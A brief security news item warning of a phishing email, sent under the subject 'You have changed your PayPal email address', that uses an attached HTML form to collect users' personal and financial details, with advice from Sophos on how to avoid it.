“PayPal email address change” phishing scheme doing rounds

PayPal users are targeted again as emails supposedly sent by the online payment company urge them to fill out a form with their personal and financial information in order to prevent the suspension of their accounts:

With “You have changed your PayPal email address” in the subject line, the sender attempts to convince the recipients that someone has accessed their account and changed the email address associated with it. To “keep the original email and restore their PayPal account”, the users are required to fill out the attached Personal Profile Form – PayPal-.htm form.

In order for everything to go smoothly, the sender also “helpfully” notes that “the form needs to be opened in a modern browser which has javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3, Opera 9).”

Unfortunately for those who fall for this scam, the submitted information gets sent directly to the phishers, points out Sophos.

As always, users are advise to ignore emails such as these – or better yet, forward them to the company’s security team – and to check if anything is amiss by going to PayPal’s legitimate site by typing in its URL directly into their browsers.